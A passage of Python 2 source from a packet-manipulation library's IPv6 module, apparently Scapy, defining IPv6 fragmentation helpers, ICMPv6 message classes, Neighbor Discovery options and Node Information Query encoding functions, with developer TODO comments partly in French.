fragmentable part fragmentable = "" for p in res: q=p[IPv6ExtHdrFragment] offset = 8*q.offset if offset != len(fragmentable): warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) fragmentable += "X"*(offset - len(fragmentable)) fragmentable += str(q.payload) # Regenerate the unfragmentable part. q = res[0] nh = q[IPv6ExtHdrFragment].nh q[IPv6ExtHdrFragment].underlayer.nh = nh del q[IPv6ExtHdrFragment].underlayer.payload q /= conf.raw_layer(load=fragmentable) return IPv6(str(q)) def fragment6(pkt, fragSize): """ Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected maximum size of fragments (MTU). The list of packets is returned. If packet does not contain an IPv6ExtHdrFragment class, it is returned in result list. """ pkt = pkt.copy() if not IPv6ExtHdrFragment in pkt: # TODO : automatically add a fragment before upper Layer # at the moment, we do nothing and return initial packet # as single element of a list return [pkt] # If the payload is bigger than 65535, a Jumbo payload must be used, as # an IPv6 packet can't be bigger than 65535 bytes. if len(str(pkt[IPv6ExtHdrFragment])) > 65535: warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") return [] s = str(pkt) # for instantiation to get upper layer checksum right if len(s) <= fragSize: return [pkt] # Fragmentable part : fake IPv6 for Fragmentable part length computation fragPart = pkt[IPv6ExtHdrFragment].payload tmp = str(IPv6(src="::1", dst="::1")/fragPart) fragPartLen = len(tmp) - 40 # basic IPv6 header length fragPartStr = s[-fragPartLen:] # Grab Next Header for use in Fragment Header nh = pkt[IPv6ExtHdrFragment].nh # Keep fragment header fragHeader = pkt[IPv6ExtHdrFragment] del fragHeader.payload # detach payload # Unfragmentable Part unfragPartLen = len(s) - fragPartLen - 8 unfragPart = pkt del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload # Cut the fragmentable part to fit fragSize. Inner fragments have # a length that is an integer multiple of 8 octets. last Frag MTU # can be anything below MTU lastFragSize = fragSize - unfragPartLen - 8 innerFragSize = lastFragSize - (lastFragSize % 8) if lastFragSize <= 0 or innerFragSize == 0: warning("Provided fragment size value is too low. " + "Should be more than %d" % (unfragPartLen + 8)) return [unfragPart/fragHeader/fragPart] remain = fragPartStr res = [] fragOffset = 0 # offset, incremeted during creation fragId = random.randint(0,0xffffffff) # random id ... if fragHeader.id is not None: # ... except id provided by user fragId = fragHeader.id fragHeader.m = 1 fragHeader.id = fragId fragHeader.nh = nh # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... while True: if (len(remain) > lastFragSize): tmp = remain[:innerFragSize] remain = remain[innerFragSize:] fragHeader.offset = fragOffset # update offset fragOffset += (innerFragSize / 8) # compute new one if IPv6 in unfragPart: unfragPart[IPv6].plen = None tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp) res.append(tempo) else: fragHeader.offset = fragOffset # update offSet fragHeader.m = 0 if IPv6 in unfragPart: unfragPart[IPv6].plen = None tempo = unfragPart/fragHeader/conf.raw_layer(load=remain) res.append(tempo) break return res ############################### AH Header ################################### # class _AHFieldLenField(FieldLenField): # def getfield(self, pkt, s): # l = getattr(pkt, self.fld) # l = (l*8)-self.shift # i = self.m2i(pkt, s[:l]) # return s[l:],i # class _AHICVStrLenField(StrLenField): # def i2len(self, pkt, x): # class IPv6ExtHdrAH(_IPv6ExtHdr): # name = "IPv6 Extension Header - AH" # fields_desc = [ ByteEnumField("nh", 59, ipv6nh), # _AHFieldLenField("len", None, "icv"), # ShortField("res", 0), # IntField("spi", 0), # IntField("sn", 0), # _AHICVStrLenField("icv", None, "len", shift=2) ] # overload_fields = {IPv6: { "nh": 51 }} # def post_build(self, pkt, pay): # if self.len is None: # pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:] # if self.segleft is None: # pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:] # return _IPv6ExtHdr.post_build(self, pkt, pay) ############################### ESP Header ################################## # class IPv6ExtHdrESP(_IPv6extHdr): # name = "IPv6 Extension Header - ESP" # fields_desc = [ IntField("spi", 0), # IntField("sn", 0), # # there is things to extract from IKE work # ] # overloads_fields = {IPv6: { "nh": 50 }} ############################################################################# ############################################################################# ### ICMPv6* Classes ### ############################################################################# ############################################################################# icmp6typescls = { 1: "ICMPv6DestUnreach", 2: "ICMPv6PacketTooBig", 3: "ICMPv6TimeExceeded", 4: "ICMPv6ParamProblem", 128: "ICMPv6EchoRequest", 129: "ICMPv6EchoReply", 130: "ICMPv6MLQuery", 131: "ICMPv6MLReport", 132: "ICMPv6MLDone", 133: "ICMPv6ND_RS", 134: "ICMPv6ND_RA", 135: "ICMPv6ND_NS", 136: "ICMPv6ND_NA", 137: "ICMPv6ND_Redirect", #138: Do Me - RFC 2894 - Seems painful 139: "ICMPv6NIQuery", 140: "ICMPv6NIReply", 141: "ICMPv6ND_INDSol", 142: "ICMPv6ND_INDAdv", #143: Do Me - RFC 3810 144: "ICMPv6HAADRequest", 145: "ICMPv6HAADReply", 146: "ICMPv6MPSol", 147: "ICMPv6MPAdv", #148: Do Me - SEND related - RFC 3971 #149: Do Me - SEND related - RFC 3971 151: "ICMPv6MRD_Advertisement", 152: "ICMPv6MRD_Solicitation", 153: "ICMPv6MRD_Termination", } icmp6typesminhdrlen = { 1: 8, 2: 8, 3: 8, 4: 8, 128: 8, 129: 8, 130: 24, 131: 24, 132: 24, 133: 8, 134: 16, 135: 24, 136: 24, 137: 40, #139: #140 141: 8, 142: 8, 144: 8, 145: 8, 146: 8, 147: 8, 151: 8, 152: 4, 153: 4 } icmp6types = { 1 : "Destination unreachable", 2 : "Packet too big", 3 : "Time exceeded", 4 : "Parameter problem", 100 : "Private Experimentation", 101 : "Private Experimentation", 128 : "Echo Request", 129 : "Echo Reply", 130 : "MLD Query", 131 : "MLD Report", 132 : "MLD Done", 133 : "Router Solicitation", 134 : "Router Advertisement", 135 : "Neighbor Solicitation", 136 : "Neighbor Advertisement", 137 : "Redirect Message", 138 : "Router Renumbering", 139 : "ICMP Node Information Query", 140 : "ICMP Node Information Response", 141 : "Inverse Neighbor Discovery Solicitation Message", 142 : "Inverse Neighbor Discovery Advertisement Message", 143 : "Version 2 Multicast Listener Report", 144 : "Home Agent Address Discovery Request Message", 145 : "Home Agent Address Discovery Reply Message", 146 : "Mobile Prefix Solicitation", 147 : "Mobile Prefix Advertisement", 148 : "Certification Path Solicitation", 149 : "Certification Path Advertisement", 151 : "Multicast Router Advertisement", 152 : "Multicast Router Solicitation", 153 : "Multicast Router Termination", 200 : "Private Experimentation", 201 : "Private Experimentation" } class _ICMPv6(Packet): name = "ICMPv6 dummy class" overload_fields = {IPv6: {"nh": 58}} def post_build(self, p, pay): p += pay if self.cksum == None: chksum = in6_chksum(58, self.underlayer, p) p = p[:2]+struct.pack("!H", chksum)+p[4:] return p def hashret(self): return self.payload.hashret() def answers(self, other): # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ... if (isinstance(self.underlayer, IPerror6) or isinstance(self.underlayer, _IPv6ExtHdr) and isinstance(other, _ICMPv6)): if not ((self.type == other.type) and (self.code == other.code)): return 0 return 1 return 0 class _ICMPv6Error(_ICMPv6): name = "ICMPv6 errors dummy class" def guess_payload_class(self,p): return IPerror6 class ICMPv6Unknown(_ICMPv6): name = "Scapy6 ICMPv6 fallback class" fields_desc = [ ByteEnumField("type",1, icmp6types), ByteField("code",0), XShortField("cksum", None), StrField("msgbody", "")] ################################## RFC 2460 ################################# class ICMPv6DestUnreach(_ICMPv6Error): name = "ICMPv6 Destination Unreachable" fields_desc = [ ByteEnumField("type",1, icmp6types), ByteEnumField("code",0, { 0: "No route to destination", 1: "Communication with destination administratively prohibited", 2: "Beyond scope of source address", 3: "Address unreachable", 4: "Port unreachable" }), XShortField("cksum", None), ByteField("length", 0), X3BytesField("unused",0)] class ICMPv6PacketTooBig(_ICMPv6Error): name = "ICMPv6 Packet Too Big" fields_desc = [ ByteEnumField("type",2, icmp6types), ByteField("code",0), XShortField("cksum", None), IntField("mtu",1280)] class ICMPv6TimeExceeded(_ICMPv6Error): name = "ICMPv6 Time Exceeded" fields_desc = [ ByteEnumField("type",3, icmp6types), ByteEnumField("code",0, { 0: "hop limit exceeded in transit", 1: "fragment reassembly time exceeded"}), XShortField("cksum", None), ByteField("length", 0), X3BytesField("unused",0)] # The default pointer value is set to the next header field of # the encapsulated IPv6 packet class ICMPv6ParamProblem(_ICMPv6Error): name = "ICMPv6 Parameter Problem" fields_desc = [ ByteEnumField("type",4, icmp6types), ByteEnumField("code",0, {0: "erroneous header field encountered", 1: "unrecognized Next Header type encountered", 2: "unrecognized IPv6 option encountered"}), XShortField("cksum", None), IntField("ptr",6)] class ICMPv6EchoRequest(_ICMPv6): name = "ICMPv6 Echo Request" fields_desc = [ ByteEnumField("type", 128, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id",0), XShortField("seq",0), StrField("data", "")] def mysummary(self): return self.sprintf("%name% (id: %id% seq: %seq%)") def hashret(self): return struct.pack("HH",self.id,self.seq)+self.payload.hashret() class ICMPv6EchoReply(ICMPv6EchoRequest): name = "ICMPv6 Echo Reply" type = 129 def answers(self, other): # We could match data content between request and reply. return (isinstance(other, ICMPv6EchoRequest) and self.id == other.id and self.seq == other.seq and self.data == other.data) ############ ICMPv6 Multicast Listener Discovery (RFC3810) ################## # tous les messages MLD sont emis avec une adresse source lien-locale # -> Y veiller dans le post_build si aucune n'est specifiee # La valeur de Hop-Limit doit etre de 1 # "and an IPv6 Router Alert option in a Hop-by-Hop Options # header. (The router alert option is necessary to cause routers to # examine MLD messages sent to multicast addresses in which the router # itself has no interest" class _ICMPv6ML(_ICMPv6): fields_desc = [ ByteEnumField("type", 130, icmp6types), ByteField("code", 0), XShortField("cksum", None), ShortField("mrd", 0), ShortField("reserved", 0), IP6Field("mladdr","::")] # general queries are sent to the link-scope all-nodes multicast # address ff02::1, with a multicast address field of 0 and a MRD of # [Query Response Interval] # Default value for mladdr is set to 0 for a General Query, and # overloaded by the user for a Multicast Address specific query # TODO : See what we can do to automatically include a Router Alert # Option in a Destination Option Header. class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710 name = "MLD - Multicast Listener Query" type = 130 mrd = 10000 # 10s for mrd mladdr = "::" overload_fields = {IPv6: { "dst": "ff02::1", "hlim": 1, "nh": 58 }} def hashret(self): if self.mladdr != "::": return struct.pack("HH",self.mladdr)+self.payload.hashret() else: return self.payload.hashret() # TODO : See what we can do to automatically include a Router Alert # Option in a Destination Option Header. class ICMPv6MLReport(_ICMPv6ML): # RFC 2710 name = "MLD - Multicast Listener Report" type = 131 overload_fields = {IPv6: {"hlim": 1, "nh": 58}} # implementer le hashret et le answers # When a node ceases to listen to a multicast address on an interface, # it SHOULD send a single Done message to the link-scope all-routers # multicast address (FF02::2), carrying in its multicast address field # the address to which it is ceasing to listen # TODO : See what we can do to automatically include a Router Alert # Option in a Destination Option Header. class ICMPv6MLDone(_ICMPv6ML): # RFC 2710 name = "MLD - Multicast Listener Done" type = 132 overload_fields = {IPv6: { "dst": "ff02::2", "hlim": 1, "nh": 58}} ########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ############### # TODO: # - 04/09/06 troglocan : find a way to automatically add a router alert # option for all MRD packets. This could be done in a specific # way when IPv6 is the under layer with some specific keyword # like 'exthdr'. This would allow to keep compatibility with # providing IPv6 fields to be overloaded in fields_desc. # # At the moment, if user inserts an IPv6 Router alert option # none of the IPv6 default values of IPv6 layer will be set. class ICMPv6MRD_Advertisement(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Advertisement" fields_desc = [ByteEnumField("type", 151, icmp6types), ByteField("advinter", 20), XShortField("cksum", None), ShortField("queryint", 0), ShortField("robustness", 0)] overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:8], s[8:] class ICMPv6MRD_Solicitation(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Solicitation" fields_desc = [ByteEnumField("type", 152, icmp6types), ByteField("res", 0), XShortField("cksum", None) ] overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:4], s[4:] class ICMPv6MRD_Termination(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Termination" fields_desc = [ByteEnumField("type", 153, icmp6types), ByteField("res", 0), XShortField("cksum", None) ] overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::6A"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:4], s[4:] ################### ICMPv6 Neighbor Discovery (RFC 2461) #################### icmp6ndopts = { 1: "Source Link-Layer Address", 2: "Target Link-Layer Address", 3: "Prefix Information", 4: "Redirected Header", 5: "MTU", 6: "NBMA Shortcut Limit Option", # RFC2491 7: "Advertisement Interval Option", 8: "Home Agent Information Option", 9: "Source Address List", 10: "Target Address List", 11: "CGA Option", # RFC 3971 12: "RSA Signature Option", # RFC 3971 13: "Timestamp Option", # RFC 3971 14: "Nonce option", # RFC 3971 15: "Trust Anchor Option", # RFC 3971 16: "Certificate Option", # RFC 3971 17: "IP Address Option", # RFC 4068 18: "New Router Prefix Information Option", # RFC 4068 19: "Link-layer Address Option", # RFC 4068 20: "Neighbor Advertisement Acknowledgement Option", 21: "CARD Request Option", # RFC 4065/4066/4067 22: "CARD Reply Option", # RFC 4065/4066/4067 23: "MAP Option", # RFC 4140 24: "Route Information Option", # RFC 4191 25: "Recusive DNS Server Option", 26: "IPv6 Router Advertisement Flags Option" } icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr", 2: "ICMPv6NDOptDstLLAddr", 3: "ICMPv6NDOptPrefixInfo", 4: "ICMPv6NDOptRedirectedHdr", 5: "ICMPv6NDOptMTU", 6: "ICMPv6NDOptShortcutLimit", 7: "ICMPv6NDOptAdvInterval", 8: "ICMPv6NDOptHAInfo", 9: "ICMPv6NDOptSrcAddrList", 10: "ICMPv6NDOptTgtAddrList", #11: Do Me, #12: Do Me, #13: Do Me, #14: Do Me, #15: Do Me, #16: Do Me, 17: "ICMPv6NDOptIPAddr", 18: "ICMPv6NDOptNewRtrPrefix", 19: "ICMPv6NDOptLLA", #18: Do Me, #19: Do Me, #20: Do Me, #21: Do Me, #22: Do Me, 23: "ICMPv6NDOptMAP", 24: "ICMPv6NDOptRouteInfo", 25: "ICMPv6NDOptRDNSS", 26: "ICMPv6NDOptEFA", 31: "ICMPv6NDOptDNSSL" } class _ICMPv6NDGuessPayload: name = "Dummy ND class that implements guess_payload_class()" def guess_payload_class(self,p): if len(p) > 1: return get_cls(icmp6ndoptscls.get(ord(p[0]),"Raw"), "Raw") # s/Raw/ICMPv6NDOptUnknown/g ? # Beginning of ICMPv6 Neighbor Discovery Options. class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" fields_desc = [ ByteField("type",None), FieldLenField("len",None,length_of="data",fmt="B", adjust = lambda pkt,x: x+2), StrLenField("data","", length_from = lambda pkt: pkt.len-2) ] # NOTE: len includes type and len field. Expressed in unit of 8 bytes # TODO: Revoir le coup du ETHER_ANY class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address" fields_desc = [ ByteField("type", 1), ByteField("len", 1), MACField("lladdr", ETHER_ANY) ] def mysummary(self): return self.sprintf("%name% %lladdr%") class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr): name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address" type = 2 class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Prefix Information" fields_desc = [ ByteField("type",3), ByteField("len",4), ByteField("prefixlen",None), BitField("L",1,1), BitField("A",1,1), BitField("R",0,1), BitField("res1",0,5), XIntField("validlifetime",0xffffffffL), XIntField("preferredlifetime",0xffffffffL), XIntField("res2",0x00000000), IP6Field("prefix","::") ] def mysummary(self): return self.sprintf("%name% %prefix%") # TODO: We should also limit the size of included packet to something # like (initiallen - 40 - 2) class TruncPktLenField(PacketLenField): __slots__ = ["cur_shift"] def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0): PacketLenField.__init__(self, name, default, cls, length_from=length_from) self.cur_shift = cur_shift def getfield(self, pkt, s): l = self.length_from(pkt) i = self.m2i(pkt, s[:l]) return s[l:],i def m2i(self, pkt, m): s = None try: # It can happen we have sth shorter than 40 bytes s = self.cls(m) except: return conf.raw_layer(m) return s def i2m(self, pkt, x): s = str(x) l = len(s) r = (l + self.cur_shift) % 8 l = l - r return s[:l] def i2len(self, pkt, i): return len(self.i2m(pkt, i)) # Faire un post_build pour le recalcul de la taille (en multiple de 8 octets) class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Redirected Header" fields_desc = [ ByteField("type",4), FieldLenField("len", None, length_of="pkt", fmt="B", adjust = lambda pkt,x:(x+8)/8), StrFixedLenField("res", "\x00"*6, 6), TruncPktLenField("pkt", "", IPv6, 8, length_from = lambda pkt: 8*pkt.len-8) ] # See which value should be used for default MTU instead of 1280 class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - MTU" fields_desc = [ ByteField("type",5), ByteField("len",1), XShortField("res",0), IntField("mtu",1280)] class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit" fields_desc = [ ByteField("type", 6), ByteField("len", 1), ByteField("shortcutlim", 40), # XXX ByteField("res1", 0), IntField("res2", 0) ] class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery - Interval Advertisement" fields_desc = [ ByteField("type",7), ByteField("len",1), ShortField("res", 0), IntField("advint", 0) ] def mysummary(self): return self.sprintf("%name% %advint% milliseconds") class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery - Home Agent Information" fields_desc = [ ByteField("type",8), ByteField("len",1), ShortField("res", 0), ShortField("pref", 0), ShortField("lifetime", 1)] def mysummary(self): return self.sprintf("%name% %pref% %lifetime% seconds") # type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support # type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)" fields_desc = [ ByteField("type",17), ByteField("len", 3), ByteEnumField("optcode", 1, {1: "Old Care-Of Address", 2: "New Care-Of Address", 3: "NAR's IP address" }), ByteField("plen", 64), IntField("res", 0), IP6Field("addr", "::") ] class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" fields_desc = [ ByteField("type",18), ByteField("len", 3), ByteField("optcode", 0), ByteField("plen", 64), IntField("res", 0), IP6Field("prefix", "::") ] _rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 1: "LLA for the new AP", 2: "LLA of the MN", 3: "LLA of the NAR", 4: "LLA of the src of TrSolPr or PrRtAdv msg", 5: "AP identified by LLA belongs to current iface of router", 6: "No preifx info available for AP identified by the LLA", 7: "No fast handovers support for AP identified by the LLA" } class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" fields_desc = [ ByteField("type", 19), ByteField("len", 1), ByteEnumField("optcode", 0, _rfc4068_lla_optcode), MACField("lla", ETHER_ANY) ] # We only support ethernet class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140 name = "ICMPv6 Neighbor Discovery - MAP Option" fields_desc = [ ByteField("type", 23), ByteField("len", 3), BitField("dist", 1, 4), BitField("pref", 15, 4), # highest availability BitField("R", 1, 1), BitField("res", 0, 7), IntField("validlifetime", 0xffffffff), IP6Field("addr", "::") ] class IP6PrefixField(IP6Field): __slots__ = ["length_from"] def __init__(self, name, default): IP6Field.__init__(self, name, default) self.length_from = lambda pkt: 8*(pkt.len - 1) def addfield(self, pkt, s, val): return s + self.i2m(pkt, val) def getfield(self, pkt, s): l = self.length_from(pkt) p = s[:l] if l < 16: p += '\x00'*(16-l) return s[l:], self.m2i(pkt,p) def i2len(self, pkt, x): return len(self.i2m(pkt, x)) def i2m(self, pkt, x): l = pkt.len if x is None: x = "::" if l is None: l = 1 x = inet_pton(socket.AF_INET6, x) if l is None: return x if l in [0, 1]: return "" if l in [2, 3]: return x[:8*(l-1)] return x + '\x00'*8*(l-3) class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191 name = "ICMPv6 Neighbor Discovery Option - Route Information Option" fields_desc = [ ByteField("type",24), FieldLenField("len", None, length_of="prefix", fmt="B", adjust = lambda pkt,x: x/8 + 1), ByteField("plen", None), BitField("res1",0,3), BitField("prf",0,2), BitField("res2",0,3), IntField("rtlifetime", 0xffffffff), IP6PrefixField("prefix", None) ] class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" fields_desc = [ ByteField("type", 25), FieldLenField("len", None, count_of="dns", fmt="B", adjust = lambda pkt,x: 2*x+1), ShortField("res", None), IntField("lifetime", 0xffffffff), IP6ListField("dns", [], length_from = lambda pkt: 8*(pkt.len-1)) ] class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075) name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option" fields_desc = [ ByteField("type", 26), ByteField("len", 1), BitField("res", 0, 48) ] from scapy.layers.dhcp6 import DomainNameListField class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option" fields_desc = [ ByteField("type", 31), FieldLenField("len", None, length_of="searchlist", fmt="B", adjust=lambda pkt, x: 1+ x/8), ShortField("res", None), IntField("lifetime", 0xffffffff), DomainNameListField("searchlist", [], length_from=lambda pkt: 8*pkt.len -8, padded=True) ] # End of ICMPv6 Neighbor Discovery Options. class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Neighbor Discovery - Router Solicitation" fields_desc = [ ByteEnumField("type", 133, icmp6types), ByteField("code",0), XShortField("cksum", None), IntField("res",0) ] overload_fields = {IPv6: { "nh": 58, "dst": "ff02::2", "hlim": 255 }} class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Neighbor Discovery - Router Advertisement" fields_desc = [ ByteEnumField("type", 134, icmp6types), ByteField("code",0), XShortField("cksum", None), ByteField("chlim",0), BitField("M",0,1), BitField("O",0,1), BitField("H",0,1), BitEnumField("prf",1,2, { 0: "Medium (default)", 1: "High", 2: "Reserved", 3: "Low" } ), # RFC 4191 BitField("P",0,1), BitField("res",0,2), ShortField("routerlifetime",1800), IntField("reachabletime",0), IntField("retranstimer",0) ] overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} def answers(self, other): return isinstance(other, ICMPv6ND_RS) class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation" fields_desc = [ ByteEnumField("type",135, icmp6types), ByteField("code",0), XShortField("cksum", None), IntField("res", 0), IP6Field("tgt","::") ] overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} def mysummary(self): return self.sprintf("%name% (tgt: %tgt%)") def hashret(self): return self.tgt+self.payload.hashret() class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement" fields_desc = [ ByteEnumField("type",136, icmp6types), ByteField("code",0), XShortField("cksum", None), BitField("R",1,1), BitField("S",0,1), BitField("O",1,1), XBitField("res",0,29), IP6Field("tgt","::") ] overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} def mysummary(self): return self.sprintf("%name% (tgt: %tgt%)") def hashret(self): return self.tgt+self.payload.hashret() def answers(self, other): return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt # associated possible options : target link-layer option, Redirected header class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Redirect" fields_desc = [ ByteEnumField("type",137, icmp6types), ByteField("code",0), XShortField("cksum", None), XIntField("res",0), IP6Field("tgt","::"), IP6Field("dst","::") ] overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} ################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ############### class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List" fields_desc = [ ByteField("type",9), FieldLenField("len", None, count_of="addrlist", fmt="B", adjust = lambda pkt,x: 2*x+1), StrFixedLenField("res", "\x00"*6, 6), IP6ListField("addrlist", [], length_from = lambda pkt: 8*(pkt.len-1)) ] class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList): name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List" type = 10 # RFC3122 # Options requises : source lladdr et target lladdr # Autres options valides : source address list, MTU # - Comme precise dans le document, il serait bien de prendre l'adresse L2 # demandee dans l'option requise target lladdr et l'utiliser au niveau # de l'adresse destination ethernet si aucune adresse n'est precisee # - ca semble pas forcement pratique si l'utilisateur doit preciser toutes # les options. # Ether() must use the target lladdr as destination class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Inverse Neighbor Discovery Solicitation" fields_desc = [ ByteEnumField("type",141, icmp6types), ByteField("code",0), XShortField("cksum",None), XIntField("reserved",0) ] overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} # Options requises : target lladdr, target address list # Autres options valides : MTU class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Inverse Neighbor Discovery Advertisement" fields_desc = [ ByteEnumField("type",142, icmp6types), ByteField("code",0), XShortField("cksum",None), XIntField("reserved",0) ] overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} ############################################################################### # ICMPv6 Node Information Queries (RFC 4620) ############################################################################### # [ ] Add automatic destination address computation using computeNIGroupAddr # in IPv6 class (Scapy6 modification when integrated) if : # - it is not provided # - upper layer is ICMPv6NIQueryName() with a valid value # [ ] Try to be liberal in what we accept as internal values for _explicit_ # DNS elements provided by users. Any string should be considered # valid and kept like it has been provided. At the moment, i2repr() will # crash on many inputs # [ ] Do the documentation # [ ] Add regression tests # [ ] Perform test against real machines (NOOP reply is proof of implementation). # [ ] Check if there are differences between different stacks. Among *BSD, # with others. # [ ] Deal with flags in a consistent way. # [ ] Implement compression in names2dnsrepr() and decompresiion in # dnsrepr2names(). Should be deactivable. icmp6_niqtypes = { 0: "NOOP", 2: "Node Name", 3: "IPv6 Address", 4: "IPv4 Address" } class _ICMPv6NIHashret: def hashret(self): return self.nonce class _ICMPv6NIAnswers: def answers(self, other): return self.nonce == other.nonce # Buggy; always returns the same value during a session class NonceField(StrFixedLenField): def __init__(self, name, default=None): StrFixedLenField.__init__(self, name, default, 8) if default is None: self.default = self.randval() # Compute the NI group Address. Can take a FQDN as input parameter def computeNIGroupAddr(name): import md5 name = name.lower().split(".")[0] record = chr(len(name))+name h = md5.new(record) h = h.digest() addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4]) return addr # Here is the deal. First, that protocol is a piece of shit. Then, we # provide 4 classes for the different kinds of Requests (one for every # valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same # data field class that is made to be smart by guessing the specifc # type of value provided : # # - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, # if not overriden by user # - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, # if not overriden # - Name in the other cases: code is set to 0, if not overriden by user # # Internal storage, is not only the value, but the a pair providing # the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@) # # Note : I merged getfield() and m2i(). m2i() should not be called # directly anyway. Same remark for addfield() and i2m() # # -- arno # "The type of information present in the Data field of a query is # declared by the ICMP Code, whereas the type of information in a # Reply is determined by the Qtype" def names2dnsrepr(x): """ Take as input a list of DNS names or a single DNS name and encode it in DNS format (with possible compression) If a string that is already a DNS name in DNS format is passed, it is returned unmodified. Result is a string. !!! At the moment, compression is not implemented !!! """ if type(x) is str: if x and x[-1] == '\x00': # stupid heuristic return x x = [x] res = [] for n in x: termin = "\x00" if n.count('.') == 0: # single-component gets one more termin += '\x00' n = "".join(map(lambda y: chr(len(y))+y, n.split("."))) + termin res.append(n) return "".join(res) def dnsrepr2names(x): """ Take as input a DNS encoded string (possibly compressed) and returns a list of DNS names contained in it. If provided string is already in printable format (does not end with a null character, a one element list is returned). Result is a list. """ res = [] cur = "" while x: l = ord(x[0]) x = x[1:] if l == 0: if cur and cur[-1] == '.': cur = cur[:-1] res.append(cur) cur = "" if x and ord(x[0]) == 0: # single component x = x[1:] continue if l & 0xc0: # XXX TODO : work on that -- arno raise Exception("DNS message can't be compressed at this point!") else: cur += 